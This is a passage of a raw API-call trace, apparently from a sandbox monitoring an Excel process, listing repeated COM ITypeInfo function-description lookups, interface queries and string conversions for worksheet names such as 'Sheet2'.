ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8b, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8c, ppFuncDesc=0x1dd598, pDummy=0x160 | out: ppFuncDesc=0x1dd598, pDummy=0x160) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8d, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8e, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8f, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x90, ppFuncDesc=0x1dd598, pDummy=0x1a0 | out: ppFuncDesc=0x1dd598, pDummy=0x1a0) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x91, ppFuncDesc=0x1dd598, pDummy=0x50 | out: ppFuncDesc=0x1dd598, pDummy=0x50) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x92, ppFuncDesc=0x1dd598, pDummy=0x160 | out: ppFuncDesc=0x1dd598, pDummy=0x160) returned 0x0 [0157.703] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.703] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dd5b8 | out: ppvObject=0x1dd5b8*=0xa02b210) returned 0x0 [0157.704] ITypeInfo2:GetCustData (in: This=0xa02b210, GUID=0x7fee51cd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x1dd5c8 | out: pVarVal=0x1dd5c8*(varType=0x0, wReserved1=0x0, wReserved2=0x92, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0157.704] IUnknown:Release (This=0xa02b210) returned 0x3 [0157.704] ITypeInfo:RemoteGetDocumentation (in: This=0xa02b210, memid=-1, refPtrFlags=0x1dd5c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0157.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Worksheet", cchWideChar=10, lpMultiByteStr=0x1dd4d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Worksheet", lpUsedDefaultChar=0x0) returned 10 [0157.704] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Worksheet") returned 0x10fec1 [0157.704] IUnknown:QueryInterface (in: This=0xa02b318, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd570 | out: ppvObject=0x1dd570*=0x0) returned 0x80004002 [0157.704] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b318, ppTypeAttr=0x1dd598, pDummy=0x10 | out: ppTypeAttr=0x1dd598, pDummy=0x10) returned 0x0 [0157.704] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b318) returned 0x0 [0157.704] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa267610, cb=0x62) returned 0xa12b890 [0157.704] IUnknown:AddRef (This=0xa02b318) returned 0x4 [0157.704] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.704] IUnknown:Release (This=0xa02b318) returned 0x3 [0157.704] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.704] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.704] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="046078a635", cchWideChar=11, lpMultiByteStr=0x1dd7e0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="046078a635", lpUsedDefaultChar=0x0) returned 11 [0157.705] GetLocalTime (in: lpSystemTime=0x1dd8c8 | out: lpSystemTime=0x1dd8c8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x3, wDay=0x8, wHour=0x14, wMinute=0x2e, wSecond=0x30, wMilliseconds=0x24)) [0157.705] _ultow_s (in: _Value=0x6078a638, _Buffer=0xa14bb0c, _BufferCount=0x9, _Radix=16 | out: _Buffer="6078a638") returned 0x0 [0157.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="066078a638", cchWideChar=11, lpMultiByteStr=0x1dd820, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="066078a638", lpUsedDefaultChar=0x0) returned 11 [0157.705] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.705] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b2c0, ppTypeAttr=0x1dd878, pDummy=0xa167150 | out: ppTypeAttr=0x1dd878, pDummy=0xa167150*=0x7) returned 0x0 [0157.705] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b2c0, ppTypeAttr=0x1dd820, pDummy=0xa167150 | out: ppTypeAttr=0x1dd820, pDummy=0xa167150*=0x7) returned 0x0 [0157.705] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b2c0) returned 0x0 [0157.705] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b2c0) returned 0x0 [0157.705] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.705] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c93f60, cb=0x100) returned 0xa1cade0 [0157.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet2", cchWideChar=7, lpMultiByteStr=0x1dd660, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet2", lpUsedDefaultChar=0x0) returned 7 [0157.705] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet2") returned 0x101ae9 [0157.705] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.705] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.705] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.705] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.705] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.705] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd420 | out: ppvObject=0x1dd420*=0x0) returned 0x80004002 [0157.705] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.705] IUnknown:AddRef (This=0xa02b318) returned 0x4 [0157.705] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dd368 | out: ppvObject=0x1dd368*=0xa02b210) returned 0x0 [0157.706] ITypeInfo2:GetCustData (in: This=0xa02b210, GUID=0x7fee51cd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x1dd378 | out: pVarVal=0x1dd378*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0157.706] IUnknown:Release (This=0xa02b210) returned 0x3 [0157.706] ITypeInfo:RemoteGetDocumentation (in: This=0xa02b210, memid=-1, refPtrFlags=0x1dd370, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1dd390 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1dd390*="") returned 0x0 [0157.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Worksheet", cchWideChar=10, lpMultiByteStr=0x1dd280, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Worksheet", lpUsedDefaultChar=0x0) returned 10 [0157.706] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Worksheet") returned 0x10fec1 [0157.706] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b2c0, ppTypeAttr=0x1dd370, pDummy=0x0 | out: ppTypeAttr=0x1dd370, pDummy=0x0) returned 0x0 [0157.706] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x0, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.706] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.706] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x9, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xa, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xb, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xc, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xd, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xe, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0xf, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x10, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x11, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x12, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x13, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x14, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x15, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x16, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.707] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x17, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.707] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x18, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x19, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1a, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1b, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1c, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1d, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1e, ppFuncDesc=0x1dd348, pDummy=0x160 | out: ppFuncDesc=0x1dd348, pDummy=0x160) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x1f, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x20, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x21, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x22, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x23, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x24, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x25, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x26, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.708] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.708] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x27, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x28, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x29, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2a, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2b, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2c, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2d, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2e, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x2f, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x30, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x31, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x32, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x33, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x34, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x35, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.709] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x36, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.709] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x37, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x38, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x39, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3a, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3b, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3c, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3d, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3e, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x3f, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) 